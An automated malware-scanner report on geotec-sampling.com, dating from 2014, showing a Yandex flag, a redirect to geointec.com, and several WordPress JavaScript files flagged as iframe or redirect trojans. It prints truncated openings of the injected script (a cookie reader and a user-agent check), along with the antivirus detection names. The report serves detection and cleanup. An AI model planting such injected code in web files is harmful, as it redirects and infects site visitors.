Malware Scanner report for geotec-sampling.com

Malicious/Suspicious/Total urls checked
7/2/16
9 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "geotec-sampling.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
Found
The website redirects visitors to the 3rd-party URL:
->http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com
www.geointec.com is marked by Google as malicious.

The website "geotec-sampling.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=geotec-sampling.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://geotec-sampling.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: magnumgraphics.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 21:49:25 GMT
Accept-Ranges: bytes
ETag: "1998209-583-4cd7c210"
Server: Apache
Content-Length: 1411
Content-Type: text/html
Last-Modified: Mon, 08 Nov 2010 09:25:36 GMT

...1411 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: magnumgraphics.com
Referer: http://www.google.com/search?q=magnumgraphics.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Scanned pages/files

Request / Server response / Status
http://www.geotec-sampling.com/
200 OK
Content-Length: 855
Content-Type: text/html
suspicious
Page code contains blacklisted domain: asg-geotecnia.es

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<ul><li><a href=".ftpquota"> .ftpquota</a></li>
<li><a href="asg-geotecnia.es/"> asg-geotecnia.es/</a></li>
<li><a href="cgi-bin/"> cgi-bin/</a></li>
<li><a href="geointec.com/"> geointec.com/</a></li>
<li><a href="geotec-sampling.com/"> geotec-sampling.com/</a></li>
<li><a href="hmoreno/"> hmoreno/</a></li>
<li><a href="readme.html"> readme.html</a></li>
&l
...[520 bytes skipped]...

http://www.geotec-sampling.com/.ftpquota
403 Forbidden
Content-Length: 330
Content-Type: text/html
clean
http://www.geotec-sampling.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://www.geotec-sampling.com/asg-geotecnia.es/
200 OK
Content-Length: 316
Content-Type: text/html
suspicious
Page code contains blacklisted domain: asg-geotecnia.es

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /asg-geotecnia.es</title>
</head>
<body>
<h1>Index of /asg-geotecnia.es</h1>
<ul><li><a href="/"> Parent Directory</a></li>
<li><a href="google36d5d9cc0ca81a66.html"> google36d5d9cc0ca81a66.html</a></li>
</ul>
</body></html>

http://www.geotec-sampling.com/asg-geotecnia.es/google36d5d9cc0ca81a66.html
200 OK
Content-Length: 53
Content-Type: text/html
clean
http://www.geotec-sampling.com/cgi-bin/
403 Forbidden
Content-Length: 329
Content-Type: text/html
clean
http://www.geotec-sampling.com/geointec.com/
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 10 Oct 2014 22:05:30 GMT
Location: http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com
Server: nginx admin
Content-Length: 0
Content-Type: text/html
X-Cache: HIT from Backend
X-Powered-By: PHP/5.3.28
malicious
http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com
200 OK
Content-Length: 63418
Content-Type: text/html
clean
http://www.geointec.com/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://www.geointec.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.5.95&ver=4.0
200 OK
Content-Length: 95731
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3171 bytes are skipped ...
his);if(t.is("img:uncached")){s.push({src:t.attr("src"),element:t[0]})}e.each(o,function(e,n){var r=t.css(n);if(!r){return true}var i;while(i=u.exec(r)){s.push({src:i[2],element:t[0]})}})})}else{i.find("img:uncached").each(function(){s.push({src:this.src,element:this})})}var f=s.length,l=0;if(f==0){t.call(i[0])}e.each(s,function(r,s){var o=new Image;e(o).bind("load error",function(e){l++;n.call(s.element,l,f,e.type=="load");if(l==f){t.call(i[0]);return false}});o.src=s.src})})};
})(jQuery)

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.5.95&ver=4.0
200 OK
Content-Length: 107645
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3278 bytes are skipped ...
ainer");var n=t.parent();var r=n.offset();var i=n.find(".bullet:first").outerWidth(true);var s=n.find(".bullet.selected").index()*i;var o=n.width();var i=n.find(".bullet:first").outerWidth(true);var u=i*e.find(">ul:first >li").length;var a=u-o;var f=a/o;var l=0-s;if(l>0)l=0;if(l<0-u+o)l=0-u+o;if(!n.hasClass("over")){rt(n,l,200)}};var rt=function(e,t,n){punchgs.TweenLite.to(e.find(".tp-thumbcontainer"),.2,{force3D:"auto",left:t,ease:punchgs.Power3.easeOut,overwrite:"auto"})}})(jQuery)

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/themes/rttheme18/js/modernizr.min.js?ver=4.0
200 OK
Content-Length: 15865
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3267 bytes are skipped ...
s,0))},Modernizr.addTest("cssfilters",function(){var a=document.createElement("div");return a.style.cssText=Modernizr._prefixes.join("filter:blur(2px); "),!!a.style.length&&(document.documentMode===undefined||document.documentMode>9)}),Modernizr.addTest("cssresize",Modernizr.testAllProps("resize")),Modernizr.addTest("svgfilters",function(){var a=!1;try{a=typeof SVGFEColorMatrixElement!==undefined&&SVGFEColorMatrixElement.SVG_FECOLORMATRIX_TYPE_SATURATE==2}catch(b){}return a});

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.18
200 OK
Content-Length: 17265
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3243 bytes are skipped ...
{this.checked=f}else{if(this.tagName.toLowerCase()=="option"){var h=e(this).parent("select");if(f&&h[0]&&h[0].type=="select-one"){h.find("option").selected(false)}this.selected=f}}})};e.fn.ajaxSubmit.debug=false;function d(){if(!e.fn.ajaxSubmit.debug){return}var f="[jquery.form] "+Array.prototype.join.call(arguments,"");if(window.console&&window.console.log){window.console.log(f)}else{if(window.opera&&window.opera.postError){window.opera.postError(f)}}}})(jQuery);

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1
200 OK
Content-Length: 9103
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3442 bytes are skipped ...
ind('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked');
$(this).find('span.wpcf7-not-valid-tip').remove();
$(this).find('img.ajax-loader').css({ visibility: 'hidden' });
});
};
$.fn.wpcf7FillResponseOutput = function(message) {
return this.each(function() {
$(this).find('div.wpcf7-response-output').append(message).slideDown('fast');
});
};
})(jQuery);

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/themes/rttheme18/js/jquery.easing.1.3.js?ver=4.0
200 OK
Content-Length: 8704
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3471 bytes are skipped ...
r/> } else if (t < (2/2.75)) {
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});

Antivirus reports:

Sophos
Troj/JSRedir-OI